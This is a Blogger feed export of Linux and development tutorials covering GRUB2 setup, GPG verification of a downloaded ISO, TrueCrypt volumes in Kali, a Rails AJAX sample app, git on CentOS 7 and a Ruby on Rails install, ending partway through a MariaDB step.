tag:blogger.com,1999:blog-11640863232666060432024-03-29T12:33:30.417+05:30Linux & Hacking GuideThe site contains tutorials to solve various linux and hacking problems.Shabbir Rangwalahttp://www.blogger.com/profile/06038985133173388069noreply@blogger.comBlogger77125tag:blogger.com,1999:blog-1164086323266606043.post-69439325402254955232017-01-19T14:56:00.002+05:302017-01-19T14:59:32.576+05:30Add entry for Windows 7 in Grub2 in CentOS7<div dir="ltr" style="text-align: left;" trbidi="on">
<br />
<br />
1) Create the following file.<br />
[root@block1 ~]# <b>vi /etc/grub.d/40_custom </b><br />
<br />
<br />
<b>menuentry "Microsoft Windows 7"{<br />set root='(hd0,msdos1)'<br />chainloader +1<br />}</b><br />
<br />
<br />
<br />
2) Run the following command.<br />
[root@block1 ~]# <b>cd /boot/grub2</b><br />
[root@block1 grub2]# <b>grub2-mkconfig -o grub.cfg </b><br />
<br />
<br />
<br />
3) Reboot the machine. You will now see entry for Windows 7 in grub menu.<br />
<br />
<br />
<br /></div>
Shabbir Rangwalahttp://www.blogger.com/profile/06038985133173388069noreply@blogger.com15tag:blogger.com,1999:blog-1164086323266606043.post-56467868364013325722017-01-19T14:03:00.000+05:302017-01-19T14:03:19.590+05:30Install grub 2 bootloader using CentOS7 Installation DVD<div dir="ltr" style="text-align: left;" trbidi="on">
<br />
<br />
<br />
1) Boot the machine using CentOS installation DVD<br />
<br />
2) On the first screen, Select the option <span style="color: red;">Troubleshooting</span>.<br />
<br />
3) On the next screen, select the option <span style="color: red;">Rescue a CentOS system</span>.<br />
<br />
4) On the next screen, The rescue environment will now attempt to find your linux installation and mount it under the dir /mnt/sysimage. Select the option <span style="color: red;">Continue</span>.<br />
<br />
5) You will now get a shell prompt.<br />
<br />
6) Type the following commands<br />
<br />
<span style="color: red;">chroot /mnt/sysimage</span><br />
<span style="color: red;"><br /></span>
<span style="color: red;">grub2-install /dev/sda</span><br />
<span style="color: red;"><br /></span>
<span style="color: red;">exit</span><br />
<span style="color: red;"><br /></span>
<span style="color: red;">exit</span><br />
<br />
<br />
7) Remove the dvd and boot from the harddisk. <br />
<br />
<br />
<br /></div>
Shabbir Rangwalahttp://www.blogger.com/profile/06038985133173388069noreply@blogger.com8tag:blogger.com,1999:blog-1164086323266606043.post-14936484469905675662016-04-22T16:10:00.000+05:302016-04-22T18:24:56.049+05:30Verify the integrity of downloaded ISO files<div dir="ltr" style="text-align: left;" trbidi="on">
<br />
You should always verify any downloaded ISO file. The reason is that the file may have been maliciously modified by a hacker and can
install malware like backdoors, keyloggers etc into your computers. <br />
<br />
The ISO file is signed using the private key to create a digital signature. The public key is used to verify the signature. The digital signature file is used to verify the ISO file.<br />
<br />
This verifies that the file has been created by the owner himself, since nobody else has his private key. Also, it verifies that the file has not been modified or tampered in any way. <br />
<br />
1) Download the ISO file.<br />
<br />
<span style="background-color: #fff2cc;">[shabbir@block1 Downloads]$ <b>wget https://github.com/Security-Onion-Solutions/security-onion/releases/download/v14.04.4.1/securityonion-14.04.4.1.iso</b></span><br />
<br />
<br />
2) Download the digital signature for the above downloaded ISO file.<br />
<br />
<span style="background-color: #fff2cc;">[shabbir@block1 Downloads]$ <b>wget https://github.com/Security-Onion-Solutions/security-onion/raw/master/securityonion-14.04.4.1.iso.sig</b></span><br />
<br />
<br />
3) Download the public key.<br />
<br />
<span style="background-color: #fff2cc;">[shabbir@block1 Downloads]$ <b>wget https://raw.githubusercontent.com/Security-Onion-Solutions/security-onion/master/KEYS</b></span><br />
<br />
4) Import the public key in your public keyring.<br />
<span style="background-color: #fff2cc;">[shabbir@block1 Downloads]$ <b>gpg --import KEYS</b></span><br />
<br />
5) View your public keyring<br />
<span style="background-color: #fff2cc;">[shabbir@block1 Downloads]$ <b>gpg2 --list-keys</b><br />/home/shabbir/.gnupg/pubring.gpg<br />--------------------------------<br />pub 4096R/ED6CF680 2012-06-29<br />uid Doug Burks <doug.burks@gmail.com><br />sub 4096R/C5D9F4EB 2012-06-29</span><br />
<br />
6) Verify the ISO file using the signature file.<br />
<span style="background-color: #fff2cc;">[shabbir@block1 Downloads]$<b> gpg --verify securityonion-14.04.4.1.iso.sig securityonion-14.04.4.1.iso</b><br /><span style="background-color: #fce5cd;"><span style="color: #444444;">gpg: Signature made Sat 19 Mar 2016 05:32:50 PM IST using RSA key ID ED6CF680<br />gpg: Good signature from "Doug Burks <doug.burks@gmail.com>"</span></span><br />gpg: WARNING: This key is not certified with a trusted signature!<br />gpg: There is no indication that the signature belongs to the owner.<br />Primary key fingerprint: BD56 2813 E345 A068 5FBB 91D3 788F 62F8 ED6C F680</span><br />
<br />
<br />
<br /></div>
Shabbir Rangwalahttp://www.blogger.com/profile/06038985133173388069noreply@blogger.com9tag:blogger.com,1999:blog-1164086323266606043.post-90950516790783659162016-04-20T23:08:00.000+05:302016-04-20T23:14:09.253+05:30Creating Encrypted volumes using Truecrypt in Kali Linux<div dir="ltr" style="text-align: left;" trbidi="on">
TrueCrypt is a software for establishing and maintaining on the fly encrypted volumes. On the fly encryption means the data is automatically encrypted before it is saved and decrypted before it is loaded without user intervention.<br />
<br />
1) Open TrueCrypt<br />
root@kali:~# <b>truecrypt</b><br />
<br />
A Gui window will open <br />
<br />
2)Click on <b>Create Volume</b>.<br />
<br />
<br />
<br />
3)Select option <b>Create an encrypted file container</b> as shown below.<br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjxE_yN6nlZHPIrFrK6kau-iOBjnIzdqr4jjB1ZfrII7PtnBcSYeBKnry3bn6gT7dLPh-qLmoeRzIq0CyQpKor3yrgZbNK2AaN9E1ngG1CWgULwicumGO1dtHe0vfPp_ZGV7EVDx68yRbse/s1600/01.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="221" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjxE_yN6nlZHPIrFrK6kau-iOBjnIzdqr4jjB1ZfrII7PtnBcSYeBKnry3bn6gT7dLPh-qLmoeRzIq0CyQpKor3yrgZbNK2AaN9E1ngG1CWgULwicumGO1dtHe0vfPp_ZGV7EVDx68yRbse/s320/01.png" width="320" /></a><br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
This option creates a container containing encrypted files. This files can be of any type as long as they are in conatiner they are encrypted<br />
<br />
4)Select the option <b>Standard TrueCrypt volume</b>. <br />
<br />
5)Specify the location for the container<br />
<b>/root/Desktop/try</b><br />
<br />
6)Specify the encryption standard.<br />
<br />
7)Select the size of volume you want.<br />
It displays free space below the box used to specify size<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj6rBlalVBnTI9Ce2QZf6TZ5PkUmIeaLyHJ9bMU8U0WQ82yuqK_f_Bg7PLQTPml7ZGbxXqTVHkEK2Mo87vb-R-SY3yKI6CC_JQk8hwUmbpjAo-QovKgsqXKYVMNg3IfP2DGEzyF2qWi7IeO/s1600/02.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="228" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj6rBlalVBnTI9Ce2QZf6TZ5PkUmIeaLyHJ9bMU8U0WQ82yuqK_f_Bg7PLQTPml7ZGbxXqTVHkEK2Mo87vb-R-SY3yKI6CC_JQk8hwUmbpjAo-QovKgsqXKYVMNg3IfP2DGEzyF2qWi7IeO/s320/02.png" width="320" /></a></div>
<br />
<br />
8) Set password for encryption.<br />
<br />
9) Select Filesystem you want on that volume<br />
<br />
10) Select I will mount th evolume only on linux<br />
<br />
11) Click on format<br />
<br />
//Mount Volume to use it to create files and directories<br />
1)Select one of the slot in the list and select file volume file <br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiIXsJdE4v49TTTQadKOFdsVhsP8LQExZsEmdPriNs0CibHSccWAv6JeMaP1nsZpEEpNnvNz-eu5JjiwJDWiqCTWYwzevVu06K3uq_v4PUzEk7-M4WKaOj_qKYTNWB6xIQ2mT4K_zhlBFIN/s1600/03.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="292" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiIXsJdE4v49TTTQadKOFdsVhsP8LQExZsEmdPriNs0CibHSccWAv6JeMaP1nsZpEEpNnvNz-eu5JjiwJDWiqCTWYwzevVu06K3uq_v4PUzEk7-M4WKaOj_qKYTNWB6xIQ2mT4K_zhlBFIN/s320/03.png" width="320" /></a></div>
<br />
<br />
2) Click on Mount to mount this volume<br />
<br />
3)now from terminal acess this volumeor u can use GUI<br />
root@kali:~# <b>df</b><br />
Filesystem 1K-blocks Used Available Use% Mounted on<br />
rootfs 11459808 9637072 1217552 89% /<br />
udev 10240 0 10240 0% /dev<br />
tmpfs 102488 508 101980 1% /run<br />
/dev/mapper/kali-root 11459808 9637072 1217552 89% /<br />
tmpfs 5120 0 5120 0% /run/lock<br />
tmpfs 204960 84 204876 1% /run/shm<br />
/dev/sda1 233191 26050 194700 12% /boot<br />
<b>/dev/mapper/truecrypt1 30356 430 27436 2% /media/truecrypt1</b><br />
<br />
4) Change directory to /media/truecrypt1 and create files and directories<br />
<b> </b>root@kali:~# <b>cd /media/truecrypt1/</b><br />
root@kali:/media/truecrypt1# <b>mkdir first</b><br />
root@kali:/media/truecrypt1/first# <b>touch foo1</b><br />
<br />
5) unmount volumes using terminal or Gui<br />
1) For Gui Click on Dismount in Truecrypt<br />
2) For Terminal goto root directory and unmount truecrypt1<br />
root@kali:/# <b>umount /media/truecrypt1 </b><br />
<b></b><br />
<br />
<br />
</div>
Unknownnoreply@blogger.com5tag:blogger.com,1999:blog-1164086323266606043.post-27409943867374852502016-04-20T22:52:00.000+05:302016-04-21T11:56:54.104+05:30AJAX in Ruby On Rails: Sample Application<div dir="ltr" style="text-align: left;" trbidi="on">
<span style="font-size: small;"><span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></span>
<span style="font-size: small;"><span style="font-family: "arial" , "helvetica" , sans-serif;">1) Create a new project. Generate Model and Controller</span></span><br />
<span style="font-size: small;"><span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></span>
<span style="font-size: small;"><span style="font-family: "arial" , "helvetica" , sans-serif;">[shabbir@neutron Aptana Studio 3 Workspace]$ <b>rails new ajax1</b></span></span><br />
<span style="font-size: small;"><span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></span>
<span style="font-size: small;"><span style="font-family: "arial" , "helvetica" , sans-serif;">[shabbir@neutron Aptana Studio 3 Workspace]$ <b>cd ajax1/</b></span></span><br />
<span style="font-size: small;"><span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></span>
<span style="font-size: small;"><span style="font-family: "arial" , "helvetica" , sans-serif;">[shabbir@neutron ajax1]$ <b>rails generate model Task name:string</b> </span></span><br />
<br />
<span style="font-size: small;"><span style="font-family: "arial" , "helvetica" , sans-serif;">[shabbir@neutron ajax1]$ <b>rake db:migrate</b> </span></span><br />
<br />
<span style="font-size: small;"><span style="font-family: "arial" , "helvetica" , sans-serif;">[shabbir@neutron ajax1]$ <b>rails generate controller tasks index </b></span></span><br />
<span style="font-size: small;"><span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></span><span style="font-size: small;"><span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></span><span style="font-size: small;"><span style="font-family: "arial" , "helvetica" , sans-serif;">2) <span style="color: red;">routes.rb</span></span></span><br />
<br />
<span style="font-size: small;"><span style="font-family: "arial" , "helvetica" , sans-serif;"> <span style="background-color: #fce5cd;"><b>resources :tasks<br /><br /> root 'tasks#index'</b></span></span></span><br />
<br />
<br />
<span style="font-size: small;"><span style="font-family: "arial" , "helvetica" , sans-serif;"><span style="font-family: "arial" , "helvetica" , sans-serif;">3</span>) <span style="color: red;">task_controller.rb</span></span></span><br />
<span style="font-size: small;"><span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></span>
<span style="background-color: #fff2cc;"><b><span style="font-size: small;"><span style="font-family: "arial" , "helvetica" , sans-serif;"><span style="background-color: #fce5cd;">class TasksController < ApplicationController<br /> def index<br /> @tasks = Task.all<br /> end<br /><br /> def new<br /> @task = Task.new<br /> end<br /><br /> def create<br /> @task= Task.new(task_params)<br /> @task.save<br /> <br /> @tasks = Task.all<br /> end <br /><br /> def edit<br /> @task = Task.find(params[:id])<br /> end<br /> <br /> def update<br /> @task = Task.find(params[:id])<br /> @task.update(task_params) <br /><br /> @tasks = Task.all<br /> end<br /><br /> def destroy<br /> @task = Task.find(params[:id])<br /> @task.destroy <br /><br /> @tasks = Task.all<br /> end<br /> <br /> private<br /> def task_params<br /> params.require(:task).permit(:name)<br /> end <br />end</span></span></span></b></span><br />
<span style="font-size: small;"><span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></span>
<span style="font-size: small;"><span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></span>
<span style="font-size: small;"><span style="font-family: "arial" , "helvetica" , sans-serif;"><span style="font-family: "arial" , "helvetica" , sans-serif;">4</span>) Views</span></span><br />
<br />
<span style="font-size: small;"><span style="font-family: "arial" , "helvetica" , sans-serif;">When the user clicks on the "New Task" link, an AJAX requ<span style="font-family: "arial" , "helvetica" , sans-serif;">est is sent to the server since "<i>remote: true</i>' is set.</span> </span></span><br />
<span style="font-size: small;"><span style="font-family: "arial" , "helvetica" , sans-serif;"><span style="color: red;">index.html.erb</span></span></span><br />
<span style="font-size: small;"><span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></span>
<b><span style="font-size: small;"><span style="font-family: "arial" , "helvetica" , sans-serif;"><span style="background-color: #fce5cd;"><div><br /> <%= link_to "New Task" , new_task_path, id: "new_link", <span style="background-color: #ea9999;">remote: true</span> %><br /></div><br /><br /><div id="task_form" style="display:none"><br /></div><br /><br /><h2> List All Tasks </h2><br /><br /><div id="tasks"><br /><%= render 'list' %><br /></div></span></span></span></b><br />
<span style="font-size: small;"><span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></span>
<br />
<span style="font-size: small;"><span style="font-family: "arial" , "helvetica" , sans-serif;">When the user clicks on the "<span style="font-family: "arial" , "helvetica" , sans-serif;">Edit</span>" or "Delete" links, an AJAX requ<span style="font-family: "arial" , "helvetica" , sans-serif;">est is sent to the server since "<i>remote: true</i>' is set.</span></span></span><br />
<span style="font-size: small;"><span style="font-family: "arial" , "helvetica" , sans-serif;"><span style="color: red;">_list.html.erb</span></span></span><br />
<br />
<span style="background-color: #fce5cd;"><b><span style="font-size: small;"><span style="font-family: "arial" , "helvetica" , sans-serif;"><table><br /><tr><br /> <th>Name</th><th colspan="3"></th> <br /></tr> </span></span></b></span><br />
<span style="background-color: #fce5cd;"><b><span style="font-size: small;"><span style="font-family: "arial" , "helvetica" , sans-serif;"><% @tasks.each do |task| %></span></span></b></span><br />
<b><span style="font-size: small;"><span style="font-family: "arial" , "helvetica" , sans-serif;"><span style="background-color: #fce5cd;"> <tr><br /> <td><%= task.name %> </td><br /> <td><%= link_to 'Edit', edit_task_path(task), <span style="background-color: #ea9999;">remote: true</span> %></td><br /> <td><%= link_to 'Delete', task, method: :delete, data: {confirm: 'Are you sure ?'}, <span style="background-color: #ea9999;">remote: true</span> %></td><br /> <br /> </tr><br /><% end %><br /></table></span></span></span></b><br />
<span style="font-size: small;"><span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></span>
<span style="font-size: small;"><span style="font-family: "arial" , "helvetica" , sans-serif;"></span></span><br />
<span style="font-size: small;"><span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></span>
<span style="font-size: small;"><span style="font-family: "arial" , "helvetica" , sans-serif;"></span></span><br />
<br />
<span style="font-size: small;"><span style="font-family: "arial" , "helvetica" , sans-serif;">When the user <span style="font-family: "arial" , "helvetica" , sans-serif;">submits the form</span>, an AJAX requ<span style="font-family: "arial" , "helvetica" , sans-serif;">est is sent to the server since "<i>remote: true</i>' is set.</span></span></span><br />
<span style="font-size: small;"><span style="font-family: "arial" , "helvetica" , sans-serif;"><span style="font-family: "arial" , "helvetica" , sans-serif;"> </span></span></span>
<span style="font-size: small;"><span style="font-family: "arial" , "helvetica" , sans-serif;"><span style="color: red;">_form.html.erb</span></span></span><br />
<span style="font-size: small;"><span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></span>
<span style="font-size: small;"><span style="font-family: "arial" , "helvetica" , sans-serif;"><b><span style="background-color: #fce5cd;"><%= form_for @task, <span style="background-color: #ea9999;">remote: true</span> do |f| %><br /><br /><%= f.label :name %><br /><%= f.text_field :name %><br /><br /><%= f.submit "Save" %><br /><% end %></span></b></span></span><br />
<br />
<br />
<span style="font-size: small;"><span style="font-family: "arial" , "helvetica" , sans-serif;"><span style="font-family: "arial" , "helvetica" , sans-serif;">5</span>) Javascript</span></span><br />
<span style="font-size: small;"><span style="font-family: "arial" , "helvetica" , sans-serif;"></span></span><br />
<span style="font-size: small;"><span style="font-family: "arial" , "helvetica" , sans-serif;"></span></span><br />
<span style="font-size: small;"><span style="font-family: "arial" , "helvetica" , sans-serif;">When the user clicks on the "New Task" link, the form is displayed and the "New Task" link is hidden. </span></span>
<span style="font-size: small;"><span style="font-family: "arial" , "helvetica" , sans-serif;"><span style="color: red;"> </span></span></span><br />
<span style="font-size: small;"><span style="font-family: "arial" , "helvetica" , sans-serif;"><span style="color: red;">new.js.erb</span></span></span><br />
<span style="font-size: small;"><span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></span>
<span style="font-size: small;"><span style="font-family: "arial" , "helvetica" , sans-serif;"><span style="background-color: #fce5cd;"><span style="color: #fce5cd;"><b><span style="color: #444444;">$("#new_link").hide();<br /><br />$("#task_form").html("<%= j (render 'form') %>");<br /><br />$("#task_form").slideDown();</span></b></span></span></span></span><br />
<span style="font-size: small;"><span style="font-family: "arial" , "helvetica" , sans-serif;"></span></span><br />
<span style="font-size: small;"><span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></span>
<br />
<span style="font-size: small;"><span style="font-family: "arial" , "helvetica" , sans-serif;"><span style="color: red;"><span style="color: #444444;">After the Task is created, the "New Task" link is displayed <span style="font-family: "arial" , "helvetica" , sans-serif;">,</span>the form is hidden and the list of tasks is updated.</span> </span></span></span><br />
<br />
<span style="font-size: small;"><span style="font-family: "arial" , "helvetica" , sans-serif;"><span style="color: red;">create.js.erb</span></span></span><br />
<span style="font-size: small;"><span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></span>
<b><span style="font-size: small;"><span style="font-family: "arial" , "helvetica" , sans-serif;"><span style="background-color: #fce5cd;">$("#new_link").show();<br /><br />$("#task_form").slideUp();<br /><br />$("#tasks").html("<%= j (render('list')) %>" );</span></span></span></b><br />
<span style="font-size: small;"><span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></span>
<br />
<br />
<br />
<span style="font-size: small;"><span style="font-family: "arial" , "helvetica" , sans-serif;">When the user clicks on the "<span style="font-family: "arial" , "helvetica" , sans-serif;">Edit</span>" link, the form is displayed and the "New Task" link is hidden. </span></span>
<span style="font-size: small;"><span style="font-family: "arial" , "helvetica" , sans-serif;"><span style="color: red;"><br /></span></span></span><br />
<span style="font-size: small;"><span style="font-family: "arial" , "helvetica" , sans-serif;"><span style="color: red;">edit.js.erb</span></span></span><br />
<span style="font-size: small;"><span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></span>
<span style="font-size: small;"><span style="font-family: "arial" , "helvetica" , sans-serif;"><span style="background-color: #fce5cd;"><b>$("#new_link").hide();<br /><br />$("#task_form").html("<%= j (render 'form') %>");<br /><br />$("#task_form").slideDown();</b></span></span></span><br />
<br />
<span style="font-size: small;"><span style="font-family: "arial" , "helvetica" , sans-serif;"></span></span><br />
<span style="font-size: small;"><span style="font-family: "arial" , "helvetica" , sans-serif;"><span style="color: red;"><span style="color: #444444;">After the Task is <span style="font-family: "arial" , "helvetica" , sans-serif;">updated</span>, the "New Task" link is displayed <span style="font-family: "arial" , "helvetica" , sans-serif;">,</span>the form is hidden and the list of tasks is updated.</span> </span></span></span><br />
<span style="font-size: small;"><span style="font-family: "arial" , "helvetica" , sans-serif;"></span></span><br />
<span style="font-size: small;"><span style="font-family: "arial" , "helvetica" , sans-serif;"><span style="color: red;">update.js.erb</span></span></span><span style="font-size: small;"><span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></span>
<span style="background-color: #fce5cd;"><b><span style="font-size: small;"><span style="font-family: "arial" , "helvetica" , sans-serif;">$("#new_link").show();<br /><br />$("#task_form").slideUp();<br /><br />$("#tasks").html("<%= j (render('list')) %>" );</span></span></b></span><br />
<br />
<br />
When the user clicks on the "Delete" link, the task is destroyed and the list of tasks is updated.<br />
<br />
<span style="font-size: small;"><span style="font-family: "arial" , "helvetica" , sans-serif;"><span style="color: red;">destroy.js.erb</span></span></span><br />
<span style="font-size: small;"><span style="font-family: "arial" , "helvetica" , sans-serif;"> </span></span><span style="background-color: #fce5cd;"><b><span style="font-size: small;"><span style="font-family: "arial" , "helvetica" , sans-serif;">$("#tasks").html("<%= j (render('list')) %>" ); </span></span></b></span><br />
<span style="font-size: small;"><span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></span>
<span style="font-size: small;"><span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></span>
</div>
Shabbir Rangwalahttp://www.blogger.com/profile/06038985133173388069noreply@blogger.com4tag:blogger.com,1999:blog-1164086323266606043.post-20098361577628139982015-11-03T10:59:00.002+05:302015-11-03T11:01:06.255+05:30Version Control using git in CentOS7<div dir="ltr" style="text-align: left;" trbidi="on">
<br />
Version control systems allow you to keep track of your software at
the source level. You can track changes, revert to previous stages, and
branch off from the base code to create alternative versions of files
and directories.
<br />
One of the most popular version control systems is <code>git</code>.
Many projects maintain their files in a Git repository, and sites like
GitHub and Bitbucket have made sharing and contributing to code with Git
easier than ever.<br />
In this guide, we will demonstrate how to install Git on a CentOS 7 server.<br />
<br />
1) Install git.<br />
<br />
[shabbir@compute1 ~]$ <b>sudo yum install git</b><br />
<br />
<br />
2) Configure your name and email.<br />
<br />
[shabbir@compute1 ~]$ <b>git config --global user.name "shabbir rangwala"</b><br />
[shabbir@compute1 ~]$ <b>git config --global user.email "shabbir.ahr@gmail.com"</b> <br />
<br />
[shabbir@compute1 ~]$ <b>git config --list</b><br />
user.name=shabbir rangwala<br />
user.email=shabbir.ahr@gmail.com<br />
<br />
<br />
3) Create your workspace. Create a dir. '<i>git</i>' in the home directory and subfolders for each of our individual projects. <br />
<br />
[shabbir@compute1 ~]$ <b>mkdir -p ~/git/perl</b><br />
[shabbir@compute1 ~]$ <b>cd ~/git/perl</b><br />
<br />
<br />
4) Copy all project files to the dir. Here we create a test file to use in our repository.<br />
<br />
[shabbir@compute1 perl]$ <b>touch test_file.pl</b><br />
<br />
<br />
5) Tell git that you want to use your current directory as a git environment.<br />
<br />
[shabbir@compute1 perl]$ <b>git init</b><br />
Initialized empty Git repository in /home/shabbir/git/perl/.git/<br />
<br />
<br />
6) Add all files and directories to your newly created repository. <br />
<br />
[shabbir@compute1 perl]$ <b>git add .</b><br />
<br />
<br />
7) Every time you add or make changes to files, you need to write a commit message. Commit messages explain what your change did.<br />
<br />
[shabbir@compute1 perl]$ <b>git commit -m "Initial Commit" -a</b><br />
<br />
the -a signifies that we want our commit message to be applied to all
added or
modified files. This is okay for the first commit, but generally you
should specify the individual files or directories that we want to
commit. <br />
<br />
To commit an individual file. <br />
[shabbir@compute1 perl]$ <b>git commit -m "Initial Commit" test_file.pl</b><br />
<br />
To add additional files or directories, you just add a space separated list to the end of that
command. <br />
<br />
8) Create an account on github.com and create a repository 'perl' <br />
<br />
<br />
9) Configure the remote repository. The name is 'origin' and the URL is 'https://github.com/RShabbir53/perl.git'.<br />
<br />
[shabbir@compute1 perl]$ <b>git remote add origin https://github.com/RShabbir53/perl.git</b><br />
<br />
[shabbir@compute1 perl]$ <b>git remote -v</b><br />
origin https://github.com/RShabbir53/perl.git (fetch)<br />
origin https://github.com/RShabbir53/perl.git (push)<br />
<br />
<br />
<br />
10) Push code to the remote server. "git push" tells git that we want to push our changes, "origin" is
the name of our newly-configured remote server and "master" is the name
of
the first branch.<br />
In the future, when you have commits that you want to push to the server, you can simply type "git push".<br />
<br />
[shabbir@compute1 perl]$ <b>git push -u origin master</b><br />
<br />
<br />
11) In the future, when you have commits that you want to push to the server, you can simply type "git push".<br />
<br /></div>
Shabbir Rangwalahttp://www.blogger.com/profile/06038985133173388069noreply@blogger.com2tag:blogger.com,1999:blog-1164086323266606043.post-2106560221907150842015-11-01T21:58:00.001+05:302016-04-20T23:12:10.446+05:30Install Ruby on Rails in CentOS7<div dir="ltr" style="text-align: left;" trbidi="on">
<br />
<br />
1) Install prerequisites.<br />
<br />
<div class="result notranslate" style="text-align: left;">
<span style="font-family: inherit;">[shabbir@compute1~]$ <b>sudo yum install -y git-core zlib zlib-devel gcc-c++ patch readline readline-devel libyaml-devel libffi-devel openssl-devel make bzip2 autoconf automake libtool bison curl sqlite-devel</b></span></div>
<div style="text-align: left;">
<style type="text/css">pre.cjk { font-family: "WenQuanYi Zen Hei Sharp",monospace; }p { margin-bottom: 0.1in; line-height: 120%; }code.cjk { font-family: "WenQuanYi Zen Hei Sharp",monospace; }</style>
</div>
<br />
<br />
2) Install rbenv<br />
<br />
<div class="result notranslate" style="text-align: left;">
<span style="font-family: inherit;"><span style="font-family: inherit;">[shabbir@compute1~]$</span> <b>git clone git://github.com/sstephenson/rbenv.git .rbenv</b></span></div>
<div class="result notranslate" style="text-align: left;">
<br />
<span style="font-family: inherit;"><span style="font-family: inherit;">[shabbir@compute1~]$</span> <b>echo 'export PATH="$HOME/.rbenv/bin:$PATH"' >> ~/.bash_profile</b></span></div>
<div class="result notranslate" style="text-align: left;">
<br />
<span style="font-family: inherit;"><span style="font-family: inherit;">[shabbir@compute1~]$</span> <b>echo 'eval "$(rbenv init -)"' >> ~/.bash_profile</b></span><br />
<span style="font-family: inherit;"><b> </b> </span></div>
<div class="result notranslate" style="text-align: left;">
<span style="font-family: inherit;"><span style="font-family: inherit;">[shabbir@compute1~]$</span> <b>exec $SHELL</b></span><br />
<span style="font-family: inherit;"><b> </b> </span></div>
<div class="result notranslate" style="text-align: left;">
<span style="font-family: inherit;"><span style="font-family: inherit;">[shabbir@compute1~]$</span> <b>git clone git://github.com/sstephenson/ruby-build.git ~/.rbenv/plugins/ruby-build</b></span><br />
<span style="font-family: inherit;"><b> </b> </span></div>
<div class="result notranslate" style="text-align: left;">
<span style="font-family: inherit;"><span style="font-family: inherit;">[shabbir@compute1~]$</span> <b>echo 'export PATH="$HOME/.rbenv/plugins/ruby-build/bin:$PATH"' <span style="font-family: inherit;">>></span> ~/.bash_profile</b></span><br />
<span style="font-family: inherit;"><b> </b> </span></div>
<div class="result notranslate" style="text-align: left;">
<span style="font-family: inherit;"><span style="font-family: inherit;">[shabbir@compute1~]$</span> <b>exec $SHELL</b></span></div>
<br />
Reboot the machine.<br />
<div class="result notranslate" style="text-align: left;">
<span style="font-family: inherit;"><span style="font-family: inherit;">[shabbir@compute1~]$</span> <b><span style="font-family: inherit;">systemctl reboot</span> </b></span></div>
<br />
<br />
<br />
3) Install Ruby <br />
<div class="result notranslate" style="text-align: left;">
<br />
<span style="font-family: inherit;">[shabbir@compute1 ~]$ <b>rbenv install -v 2.2.3</b></span></div>
<div style="text-align: left;">
<span style="font-family: inherit;"></span></div>
<div class="result notranslate" style="text-align: left;">
<br />
<span style="font-family: inherit;">[shabbir@compute1 ~]$ <b>rbenv global 2.2.3</b></span></div>
<br />
<br />
Verify that Ruby was installed properly.<br />
[shabbir@compute1 ~]$ <b>ruby -v</b><br />
ruby 2.2.3p173 (2015-08-18 revision 51636) [x86_64-linux]<br />
<br />
<div class="result notranslate" style="text-align: left;">
<br />
<span style="font-family: inherit;">[shabbir@compute1 ~]$ <b>echo "gem: --no-document" > ~/.gemrc</b></span></div>
<div class="result notranslate" style="text-align: left;">
<br />
<span style="font-family: inherit;">[shabbir@compute1 ~]$ <b>gem install bundler</b></span></div>
<br />
<br />
<br />
4) Install Rails <br />
<br />
<span style="font-family: inherit;"><span style="font-family: inherit;">[shabbir@compute1 ~]$</span> <b>gem install rails -v 4.2.4</b></span><br />
<br />
<span style="font-family: inherit;"><span style="font-family: inherit;">[shabbir@compute1 ~]$</span> <b>rbenv rehash</b></span><span style="font-family: inherit;"> </span><br />
<br />
Verify that Rails was installed properly.<br />
<span style="font-family: inherit;">[shabbir@compute1 ~]$ <b>rails -v</b></span><br />
<div style="text-align: left;">
<span style="font-family: inherit;">Rails 4.2.4</span></div>
<span style="font-family: inherit;"></span><br />
<pre class="result notranslate"> </pre>
<pre class="result notranslate"> </pre>
5) Install JavaScript Runtime<br />
<div class="result notranslate" style="text-align: left;">
<br />
Install EPEL Repository.<br />
<span style="font-family: inherit;"><span style="font-family: inherit;">[shabbir@compute1 ~]$</span> <b>sudo yum -y install epel-release</b></span></div>
<div class="result notranslate" style="text-align: left;">
<br />
<br />
<span style="font-family: inherit;"><span style="font-family: inherit;">[shabbir@compute1 ~]$</span> <b>sudo yum install nodejs</b></span></div>
<br />
<br />
<br />
6) Install Database <br />
<br />
[shabbir@compute1
~]$ <b>sudo yum groupinstall mariadb
</b><br />
<pre class="result notranslate"></pre>
<div class="result notranslate" style="text-align: left;">
<br />
[shabbir@compute1 ~]$ <b>sudo yum install mariadb-devel</b><br />
<br />
